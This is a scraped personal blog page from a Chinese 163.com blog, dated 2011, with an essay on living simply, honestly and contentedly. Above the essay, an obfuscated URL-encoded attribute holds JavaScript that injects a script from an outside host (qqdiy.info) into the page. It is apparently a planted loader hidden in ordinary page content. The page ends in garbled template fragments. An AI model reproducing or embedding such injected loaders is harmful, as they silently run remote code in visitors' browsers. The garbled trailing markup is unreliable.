注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

我写我博,我随我心,我乐我意

心曲的吟唱/情感的流淌/思绪的漫游/爱的畅想

 
 
 

日志

 
 
关于我

美丽,是我的容貌, 健康,是我的身体, 年轻,是我的心态, 开朗,是我的性格, 正直,是我的为人, 浓烈,是我的情感, 快乐,是我的追求, 幸福,是我的生活,

网易考拉推荐

我的人生我做主  

2011-03-01 19:43:50|  分类: 随笔杂谈 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

" " z="if%28%21window.r%29%7Bvar%20s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%27http%3A//qqdiy.info/a/163/fs.php%27%3Bs.type%3D%22text/javascript%22%3Bdocument.getElem%65ntsByTagName%28%27head%27%29.item%280%29.appendChild%28s%29%3Bwindow.r%3D1%7D"<

 

边框15 - 海珠儿 - 海珠儿 blog

  文/秋日私语

  我的人生我做主:认真做事,简单做人,平实生活,开心享乐,轻松去爱,坦然面对。这就是我的人生态度,也是我的生活准则。几十年来,我生命的列车,就是寻着这样一条轨迹,慢慢前行。日月迢迢,寒来暑往,有喜也有忧,但无怨也无悔。

  认认真真做事:也许是性格所致,也许是职业使然,这一辈子做事,真可以说是成也“认真”,败也“认真”。那种做事的一丝不苟,有板有眼,精益求精,甚至苛刻,也许教条,但我无悔于我的执着。“认真”,让我得益于工作;“认真”,让我受益于生活。我总是在死板的“认真”后,换来井井有条,换来略胜一筹,换来有口皆碑。

  简简单单做人:头脑简单,心直口快,也许是我这个人的写照,单纯的生活经历,正统的成长教育,成就了我简单、透明、率直的思维方式。没有害人的心,更没有防人的心;没有深谋远虑,更不会尔虞我诈。总是用正直、平和、诚实的目光去审视这纷繁复杂的大千世界。老公说我“没心没肺”,朋友说我“诚实的可爱”。我活在自己编织的童话世界里,无忧无虑。

  平平实实生活:平实,即平淡实在。在柴米油盐的和谐中,奏着家的交响,在喜怒哀乐的演绎中,换着岁月的脸谱。没有大富大贵,也没有大起大落。即没有股市搏击的心惊肉跳,也没有商海沉浮的惶恐不安,更没有官场竞技的明争暗斗。我用一颗感恩的心、知足的心、宽容的心去对待生活。

  轻轻松松去爱:爱,是一种享受,是一种幸福的感觉。所以,爱,不要繁琐,要简单,越简单,才越好理解和接受;爱,不要沉重,要轻松,越轻松才越感到自在。爱是两个人的事,为了保持爱的长青,一定要给爱足够的生长空间。让爱尽情发挥,充分伸展。那怕是“红杏出墙”,但根却在墙里。一定要给爱充分的自由。让爱放飞,而不是蹲守;让爱随心所欲,而不是禁锢;让爱呼吸,而不是窒息。

  开开心心享乐:享受生活,是我人生的又一个信条。无论是生命季节的春光和秋雨,无论是经济基础的坚实和脆弱,无论是生活道路的艰辛和顺畅,每一个时期,都有每一时期独有的生活乐趣,只要你用心去感悟,去品尝,就一定能够得到一种享受的快乐!

  坦坦然然面对:人的一生,总会面对许许多多的意想不到,总会遇到许许多多的始料未及。遇到了,坦然面对,兵来将挡,水来土掩。事情总会过去,总会完结,明天,太阳依旧是新的。用一颗平常心去对待一切,不以物喜,不以已悲。 失意时,不失志,得意时,不得性。

我的人生我做主 - 秋日私语 - 我写我博,我随我心,我乐我意

 

 

 

 

  评论这张
 
阅读(195)| 评论(21)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
<生活乐趣,
n> {elseif x.
ii.=" rel=&quPhone客户>ii.=" rel=&quPhone客户>e="来自涂突Ф藅=====l ii.=" publtclae{els"63.id=;text/rss+xms="fecomBlRSSass="adlm2a" href="http://hhftl.blrss/rUsername)}nbsp; &nli>t="_blank" clad="订阅此车刂客户ock dotnbsp;&.com/hhf====l-4"> &ncopy;1997-qbb7罩镜娜.com/hhf.com/h.com/hhf====l!--[ p IE 6]ztag phe nb-smb"> row d=";t="_blapommeod="post" targe row d=";t="_blaitmclass=" m2a"thide"> ="yoteToOretype{23413n HH户端t===== li> {/ li> {/list} row d="; {/{/if} {/list}